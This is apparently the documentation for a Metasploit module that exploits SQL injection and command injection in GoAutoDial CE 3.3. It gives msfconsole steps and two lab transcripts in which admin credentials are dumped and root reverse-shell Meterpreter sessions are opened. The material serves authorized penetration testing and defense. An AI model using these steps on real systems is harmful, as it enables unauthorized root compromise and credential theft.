## Description

This module exploits a SQL injection flaw and command injection flaw within GoAutoDial CE 3.3, which permits authentication bypass and a complete compromise of the underlying system with root privileges. This module also extracts the administrative users password from the underlying database. 

## Affected software

GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html
Refer to: https://www.exploit-db.com/exploits/36807/

NOTE: GoAutoDial heavily restricts inbound traffic via iptables rules (and uses fail2ban, as well).  This can cause bind payloads to quietly fail.  For bind payloads, using ports which allow inbound connections but have no service running is ideal (ports 21 and 222 fall into this category for default GoAutoDial behavior).

## Verification Steps

- Start `msfconsole`
- Do `use exploit/linux/http/goautodial_3_rce_command_injection`
- Do `set RHOST <IP>`
- Do `set LHOST <IP>`
- Do `set LPORT <PORT>`
- Do `run`
- Wait for shell

## Scenarios

### Targeting 64-bit GoAutoDial

```
msf > use exploit/linux/http/goautodial_3_rce_command_injection
msf exploit(goautodial_3_rce_command_injection) > set rhost 172.16.191.150
rhost => 172.16.191.150
msf exploit(goautodial_3_rce_command_injection) > check
[+] 172.16.191.150:443 The target is vulnerable.
msf exploit(goautodial_3_rce_command_injection) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(goautodial_3_rce_command_injection) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] 172.16.191.150:443 - Trying SQL injection...
[+] 172.16.191.150:443 - Authentication Bypass (SQLi) was successful
[*] 172.16.191.150:443 - Dumping admin password...
[+] 172.16.191.150:443 - Found credentials: admin|goautodial|Admin|||Y
[*] 172.16.191.150:443 - Sending payload...
[*] Command Stager progress -  68.67% done (798/1162 bytes)
[*] Sending stage (2854264 bytes) to 172.16.191.150
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.150:52876) at 2017-07-02 11:08:02 -0400
[*] Command Stager progress - 100.00% done (1162/1162 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : go.goautodial.org
OS           : CentOS 5.11 (Linux 2.6.18-407.el5)
Architecture : x64
Meterpreter  : x64/linux
```

### Targeting 32-bit GoAutoDial
```
msf > use exploit/linux/http/goautodial_3_rce_command_injection
msf exploit(goautodial_3_rce_command_injection) > set lhost 10.0.2.4
lhost => 10.0.2.4
msf exploit(goautodial_3_rce_command_injection) > set rhost 10.0.2.44
rhost => 10.0.2.44
msf exploit(goautodial_3_rce_command_injection) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(goautodial_3_rce_command_injection) > run

[*] Started reverse TCP handler on 10.0.2.4:4444
[*] 10.0.2.44:443 - Trying SQL injection...
[+] 10.0.2.44:443 - Authentication Bypass (SQLi) was successful
[*] 10.0.2.44:443 - Dumping admin password...
[+] 10.0.2.44:443 - Found credentials: admin|newpassword|Admin|||Y
[*] 10.0.2.44:443 - Sending payload...
[*] Command Stager progress -  78.66% done (796/1012 bytes)
[*] Sending stage (798104 bytes) to 10.0.2.44
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.44:49035) at 2017-07-07 15:49:48 -0500
[*] Command Stager progress - 100.00% done (1012/1012 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : go.goautodial.org
OS           : CentOS 5.10 (Linux 2.6.18-371.11.1.el5)
Architecture : i686
Meterpreter  : x86/linux
```
